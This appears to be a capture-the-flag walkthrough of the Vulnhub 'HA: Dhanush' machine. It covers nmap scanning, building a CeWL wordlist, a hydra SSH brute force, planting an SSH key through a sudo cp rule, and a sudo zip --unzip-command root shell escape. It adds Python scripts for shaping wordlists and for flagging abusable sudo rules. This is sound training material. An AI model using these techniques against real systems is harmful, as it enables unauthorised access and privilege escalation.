Vulnhub machine pentest [HA-Dhanush]

Name: HA: Dhanush
Release date: 9 November 2019

Level: Intermediate
Task: enumerate the target machine and obtain root access.

下载:

  • Download: https://drive.google.com/file/d/1BfOvrrIqkVeeEhv3j7yASKmVNw-84s3L/view?usp=sharing
  • Download (Mirror): https://download.vulnhub.com/ha/dhanush.zip
  • Download (Torrent): https://download.vulnhub.com/ha/dhanush.zip.torrent

Description:

Dhanush was once the pinnacle of weapon technology. It redefined warfare to a whole new level and is mentioned in every mythological account in history.
Choose your Dhanush, draw the string and shoot to get root! Enumeration is the key!!!! Some knowledge of Indian mythology and of bows and arrows may help.

Information gathering

Start with nmap

root@kali:~# nmap -sn -v 192.168.142.0/24
Nmap scan report for 192.168.142.131
Host is up (0.00030s latency).
MAC Address: 00:0C:29:22:66:8B (VMware)
root@kali:~# nmap -A -v -sV -Pn -T4 --script=vuln 192.168.142.131
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.142.131:80/assets/js/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=S%3bO%3dD%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=D%3bO%3dD%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.142.131:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
|_ http://192.168.142.131:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.29:
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763
|_ CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
root@kali:~# nmap -p- -A 192.168.142.131
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Dhanush
65345/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e3:2f:3d:dd:ac:42:d4:d5:de:ec:9b:19:0b:45:3e:13 (RSA)
| 256 89:02:8d:a5:e0:75:a5:34:3b:52:3a:6c:d1:f4:05:da (ECDSA)
|_ 256 ea:af:62:07:73:d0:d5:1e:fb:a9:12:62:34:27:52:d9 (ED25519)

Three things to note before moving on. The first scan ran against nmap's default top-1000 ports and saw only port 80; it was the full `-p-` sweep that found SSH hiding on 65345, so never trust the default port range on a CTF box. The http-sql-injection hits are false positives: `?C=N;O=D` and the other `C=`/`O=` pairs are Apache mod_autoindex sort parameters on the directory listings under /assets/, and the vulners CVE list is matched on the version banner alone, nothing confirmed. What the web page does offer is a lot of text about Dhanush, and the names on it may well be usernames or passwords, so build a wordlist from it with cewl.

root@kali:~# cewl http://192.168.142.131/ -w dict1.txt
CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root@kali:~# cat dict1.txt
Dhanush
धनष
Lord
Feature
Wielded
the
यद
यग
Arjuna
was
able
his
and
Then
path
The
Header
लनर
भवत
भरत
यत
थनमधर
तदत
मन
सजम
यहम
परत
रणय
सधन
वनशय
दष
कतम
मसस
थपनर
थय
भवम
What
Banner
Dhanushधनष
Weapon
for
shooting
arrows
typically
made
curved
piece
wood
joined
both
ends
Taut
String
दनय
सबस
तशल
धनषWorld
Most
Powerful
Dhanushs
Sharang
Dhanushसरग
Vishnu
Made
Viswakarma
Pinak
Dhanushपनक
ShivaMade
pinak
Gandiv
Dhanushगण
डव
ArjunaMade
Brahma
Portfolio
Choose
Yoursअपन
चन
Heat
Mahabharata
not
lift
against
Family
Gurus
Krishna
tells
him
this
Dhram
Eternal
Truth
war
You
CTF
Warrior
Pick
your
attain
Boot
Hacking
Articles
All
rights
reserved
Scripts
Raj
Aarti
Geet
Yashika
Kavish
Rishab
Japneet
Pavan

Brute-force the SSH username and password

root@kali:~# hydra -L dict1.txt -P dict1.txt ssh://192.168.142.131 -s 65345 -I -e nsr -f
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-12-17 22:03:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 13338 login tries (l:114/p:117), ~834 tries per task
[DATA] attacking ssh://192.168.142.131:65345/
[STATUS] 214.00 tries/min, 214 tries in 00:01h, 13127 to do in 01:02h, 16 active
[STATUS] 149.67 tries/min, 449 tries in 00:03h, 12892 to do in 01:27h, 16 active
[STATUS] 154.14 tries/min, 1079 tries in 00:07h, 12262 to do in 01:20h, 16 active
[STATUS] 154.67 tries/min, 2320 tries in 00:15h, 11024 to do in 01:12h, 16 active

[STATUS] 151.68 tries/min, 4702 tries in 00:31h, 8643 to do in 00:57h, 16 active
[STATUS] 151.43 tries/min, 7117 tries in 00:47h, 6229 to do in 00:42h, 16 active
[65345][ssh] host: 192.168.142.131 login: pinak password: Gandiv
[STATUS] attack finished for 192.168.142.131 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-12-17 22:56:20
  • Username/password: pinak/Gandiv
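The hydra run above took close to an hour because the raw cewl output was fed in as both login list and password list: 114 "logins" including Devanagari fragments and capitalised words that can never be Unix login names. The script below is an added example, not part of the original write-up or of hydra: it shapes a cewl wordlist into a login list (lowercased, restricted to portable login-name characters, de-duplicated) and a password list (case preserved, since Gandiv is not gandiv), then enumerates the (login, password) pairs that `-e nsr` adds, so the search space can be sized before the attack is launched. The ten-word sample is a constructed subset of the dict1.txt shown above, the pair ordering is an assumption (hydra's own scheduling is not reproduced), and 150 tries/min is taken from the STATUS lines above.

```python
"""Shape a CeWL wordlist into SSH login/password candidate lists.

Added example, not from the original write-up or from hydra/cewl.
"""
import re

# Constructed sample: ten lines in the shape of the cewl dict1.txt above.
CEWL_WORDS = """Dhanush
धनष
Lord
Arjuna
Sharang
Pinak
pinak
Gandiv
Vishnu
Raj""".splitlines()

# Portable POSIX login names: start with a letter or '_', then [a-z0-9_-], max 32 chars.
LOGIN_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def login_candidates(words):
    """Lowercase, keep only plausible Unix login names, de-duplicate preserving order."""
    seen, out = set(), []
    for w in words:
        cand = w.strip().lower()
        if LOGIN_RE.match(cand) and cand not in seen:
            seen.add(cand)
            out.append(cand)
    return out


def password_candidates(words):
    """Passwords keep their case; just strip whitespace and de-duplicate."""
    seen, out = set(), []
    for w in words:
        cand = w.strip()
        if cand and cand not in seen:
            seen.add(cand)
            out.append(cand)
    return out


def hydra_pairs(logins, passwords, extra="nsr"):
    """Enumerate (login, password) pairs the way `hydra -L -P -e nsr` does.

    -e n: empty password; -e s: password == login; -e r: reversed login.
    The order below is an assumption, not hydra's real scheduling.
    Identical pairs are collapsed, as hydra also skips duplicate tries.
    """
    seen, pairs = set(), []

    def add(pair):
        if pair not in seen:
            seen.add(pair)
            pairs.append(pair)

    for login in logins:
        if "n" in extra:
            add((login, ""))
        if "s" in extra:
            add((login, login))
        if "r" in extra:
            add((login, login[::-1]))
        for pw in passwords:
            add((login, pw))
    return pairs


def estimate_minutes(n_tries, tries_per_min=150.0):
    """Wall-clock estimate; ~150/min is what the hydra run above sustained."""
    return n_tries / tries_per_min


if __name__ == "__main__":
    logins = login_candidates(CEWL_WORDS)
    pws = password_candidates(CEWL_WORDS)
    pairs = hydra_pairs(logins, pws)
    print(f"{len(logins)} logins x {len(pws)} passwords -> {len(pairs)} tries, "
          f"~{estimate_minutes(len(pairs)):.0f} min at 150/min")
    print("pinak/Gandiv covered:", ("pinak", "Gandiv") in pairs)
```

Writing the two lists to separate files and running `hydra -L logins.txt -P passwords.txt -e nsr -t 4 ssh://192.168.142.131 -s 65345` would cut the try count several-fold on the full dict1.txt, and `-t 4` is what hydra itself recommends against an SSH daemon that caps parallel sessions.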

With SSH credentials in hand, log in as pinak/Gandiv and look around. `sudo -l` shows that pinak may run /bin/cp as user sarang with no password, which is worth using. In sarang's home directory there is a hidden directory named .ssh, but it is mode 700 and owned by sarang, so pinak cannot enter or read it.

root@kali:~# ssh pinak@192.168.142.131 -p 65345
The authenticity of host '[192.168.142.131]:65345 ([192.168.142.131]:65345)' can't be established.
ECDSA key fingerprint is SHA256:QVJEE1sfL5RUI7RaUefp0Cr9woMla1AyMzYAY683i5s.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.142.131]:65345' (ECDSA) to the list of known hosts.
pinak@192.168.142.131's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Last login: Fri Nov 8 09:05:56 2019
pinak@ubuntu:~$ id
uid=1001(pinak) gid=1001(pinak) groups=1001(pinak)
pinak@ubuntu:~$ whoami
pinak
pinak@ubuntu:~$
pinak@ubuntu:~$ pwd
/home/pinak
pinak@ubuntu:~$ sudo -l
Matching Defaults entries for pinak on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pinak may run the following commands on ubuntu:
(sarang) NOPASSWD: /bin/cp
pinak@ubuntu:~$ cd /home/sarang
pinak@ubuntu:/home/sarang$ ls -la
total 32
drwxr-xr-x 4 sarang sarang 4096 Nov 8 08:03 .
drwxr-xr-x 5 root root 4096 Nov 7 21:01 ..
-rw------- 1 sarang sarang 1 Nov 8 09:07 .bash_history
-rw-r--r-- 1 sarang sarang 220 Nov 7 21:01 .bash_logout
-rw-r--r-- 1 sarang sarang 3771 Nov 7 21:01 .bashrc
drwx------ 2 sarang sarang 4096 Nov 7 21:07 .cache
-rw-r--r-- 1 sarang sarang 807 Nov 7 21:01 .profile
drwx------ 2 sarang sarang 4096 Nov 7 21:35 .ssh
pinak@ubuntu:/home/sarang$ cd .ssh
-bash: cd: .ssh: Permission denied

Use the cp rule to become sarang. The goal is to get an SSH public key into the .ssh directory in sarang's home. pinak cannot read or enter that directory, but `sudo -u sarang /bin/cp` runs cp as sarang, and sarang can write there, so cp can deliver the key. First generate a key pair with ssh-keygen; it lands in pinak's own ~/.ssh as id_rsa (private) and id_rsa.pub (public). Copy the public key to pinak's home directory. (The `chmod 777 id_rsa.pub` in the session below is unnecessary: ssh-keygen already creates the public key world-readable, and all that matters is that cp, running as sarang, can read the source path, which it can because /home/pinak is world-readable.)

pinak@ubuntu:~$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/pinak/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/pinak/.ssh/id_rsa.
Your public key has been saved in /home/pinak/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:M3EjxpbK4Ni6vFhkYjtaUWnV7IRl6gK/2ab8B3FLz+U pinak@ubuntu
The key's randomart image is:
+---[RSA 2048]----+
| .=o |
| o.++. |
| . = .oB o |
| O +.+++ .. |
|..= = ++S+ o |
|.+.o =. .oo E |
| o+ o o. |
|.=.o o . |
|o +.o... |
+----[SHA256]-----+
pinak@ubuntu:~$ cd .ssh
pinak@ubuntu:~/.ssh$ ls
id_rsa id_rsa.pub
pinak@ubuntu:~/.ssh$ chmod 777 id_rsa.pub
pinak@ubuntu:~/.ssh$ cp id_rsa.pub /home/pinak
pinak@ubuntu:~/.ssh$ cd ..
pinak@ubuntu:~$ ls
id_rsa.pub

With the public key staged, run cp as sarang to copy it to /home/sarang/.ssh/authorized_keys, giving sudo the source path and the destination path. Because cp runs as sarang, the new file is owned by sarang with mode 644 from the default umask, which is exactly what sshd's StrictModes accepts. Then log in as sarang with the private key just generated. Note that `-i /.ssh/authorized_keys` in the session below is a typo (the path does not exist, hence the warning); ssh falls back to the default identity /home/pinak/.ssh/id_rsa, which is the matching private key, so the login works anyway. Once in as sarang, run `sudo -l` again, since the goal is root: sarang may run zip as root with no password, and that can be abused to escalate privileges on this machine.

pinak@ubuntu:~$ sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys
pinak@ubuntu:~$ ssh sarang@127.0.0.1 -i /.ssh/authorized_keys -p 65345
Warning: Identity file /.ssh/authorized_keys not accessible: No such file or directory.
The authenticity of host '[127.0.0.1]:65345 ([127.0.0.1]:65345)' can't be established.
ECDSA key fingerprint is SHA256:QVJEE1sfL5RUI7RaUefp0Cr9woMla1AyMzYAY683i5s.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[127.0.0.1]:65345' (ECDSA) to the list of known hosts.
Enter passphrase for key '/home/pinak/.ssh/id_rsa':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Last login: Thu Nov 7 21:35:24 2019 from 192.168.0.100
sarang@ubuntu:~$ sudo -l
Matching Defaults entries for sarang on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sarang may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/zip

Privilege escalation

Staying in the sarang SSH session, `sudo -l` lists what sarang may run with root privileges: /usr/bin/zip, with no password required.
Escalate from sarang to root as follows. Create an empty file lucifer11 so there is something to archive, then run zip under sudo with -T and --unzip-command. -T tells zip to test the finished archive by running an unzip command against it, and --unzip-command replaces that command with one of our choosing; zip appends the (temporary) archive path as an extra argument, so what actually runs, as root, is `sh -c /bin/bash /tmp/lucifer11.zip`, where the archive path merely becomes $0 and bash starts as root. Privilege escalation succeeded.

sarang@ubuntu:~$ touch lucifer11
sarang@ubuntu:~$ ls
lucifer11
sarang@ubuntu:~$ pwd
/home/sarang
sarang@ubuntu:~$ sudo zip /tmp/lucifer11.zip /home/sarang/lucifer11 -T --unzip-command="sh -c /bin/bash"
adding: home/sarang/lucifer11 (stored 0%)
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~# whoami
root

This privilege-escalation trick is too slick not to write down:

sudo zip /tmp/lucifer11.zip /home/sarang/lucifer11 -T --unzip-command="sh -c /bin/bash"
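Both hops on this box came from `sudo -l`: `(sarang) NOPASSWD: /bin/cp` gave a file write as sarang, and `(root) NOPASSWD: /usr/bin/zip` gave a root shell. The script below is an added example, not part of the original write-up or of sudo: it parses the "may run the following commands" section of `sudo -l` output and flags rules whose binary has a known abuse primitive, NOPASSWD rules first. The sample output is constructed from the two sessions above (with one extra harmless apt-get rule added to show a non-finding), and the primitive table is a hand-picked subset modelled on GTFOBins; the abuse command strings in it are assumptions chosen to match this machine, not a complete catalogue.

```python
"""Triage `sudo -l` output for abusable NOPASSWD rules.

Added example, not part of the original write-up.
"""
import re

# Constructed sample, merged from the pinak and sarang `sudo -l` output above,
# plus one harmless rule so a non-finding is visible.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for pinak on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pinak may run the following commands on ubuntu:
    (sarang) NOPASSWD: /bin/cp
    (root) NOPASSWD: /usr/bin/zip
    (root) /usr/bin/apt-get
"""

# binary -> (primitive, how to abuse it). Assumed mapping modelled on GTFOBins.
PRIMITIVES = {
    "cp": ("file-write as target user",
           "sudo -u {user} cp id_rsa.pub /home/{user}/.ssh/authorized_keys"),
    "zip": ("shell as target user",
            "sudo -u {user} zip /tmp/x.zip /etc/hostname -T --unzip-command='sh -c /bin/bash'"),
    "vim": ("shell as target user", "sudo -u {user} vim -c ':!/bin/sh'"),
    "find": ("shell as target user", "sudo -u {user} find . -exec /bin/sh \\; -quit"),
    "tar": ("shell as target user",
            "sudo -u {user} tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"),
}

# "(runas) TAG: command" or "(runas) command"; runas may look like "root : root".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_rules(text):
    """Return [(runas_user, nopasswd, command)] from the 'may run' section."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()   # "(root : root)" -> root
        nopasswd = "NOPASSWD" in (m.group("tags") or "")
        rules.append((runas, nopasswd, m.group("cmd").strip()))
    return rules


def triage(text):
    """Flag rules with a known primitive: NOPASSWD first, then root-targeted first."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_rules(text):
        user = "root" if runas == "ALL" else runas
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary == "ALL":
            findings.append((runas, nopasswd, cmd, "full sudo", f"sudo -u {user} /bin/bash"))
        elif binary in PRIMITIVES:
            primitive, howto = PRIMITIVES[binary]
            findings.append((runas, nopasswd, cmd, primitive, howto.format(user=user)))
    findings.sort(key=lambda f: (not f[1], f[0] != "root"))
    return findings


if __name__ == "__main__":
    for runas, nopasswd, cmd, primitive, howto in triage(SUDO_L_OUTPUT):
        flag = "NOPASSWD" if nopasswd else "password"
        print(f"[{flag}] ({runas}) {cmd}: {primitive}\n    {howto}")
```

Paste real `sudo -l` output into SUDO_L_OUTPUT (or read it from stdin) and the zip rule comes out on top as a direct root shell, with the cp rule right behind it as the write primitive that gets you to the user who holds the zip rule.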

Get the flag

root@ubuntu:~# cd /root
root@ubuntu:/root# ls
flag.txt
root@ubuntu:/root# cat flag.txt

@p
@@@.
@@@@@
@@@@@@@
*"`]@P ^^
]@P
]@P
,,,, ]@P ,,gg,,
g@@@@@@@@@b ]@P ,@@@@@@@@@@g,
,@@@@@@BNPPNB@@@@@@@@@@@@@@@@P**PNB@@@@@w
g@@@@P^` %NNNNN@NNNNNP *B@@@g
g@@@P` -@ "B@@w
,@@@` ]@ %@@,
@@P- ]@ *@@,
,@@" ]@ *B@
,@N" y@@B %@,
,, g@P- ]@@@P *Bg ,gg
@@@@$,,,,,,,,,,,,,,,,,,,,,,,,,,ggggg@@@@wwwwwwwwwgggggggggww==========mm4NNN"

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Nisha Sharma : https://in.linkedin.com/in/nishasharmaa

+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
____________________________________

The flag looks great, like a sword straight into the enemy's heart!!! And then driven right through!!!

Key points: username harvesting from the web page, hydra brute force, SSH public-key abuse, and abuse of the password-less sudo rules for /usr/bin/zip and /bin/cp.

Sorry, this time I still didn't find a certain Greek master's idiot-proof one-click script, i am so sorry about this... It's a pity...

The end, to be continued...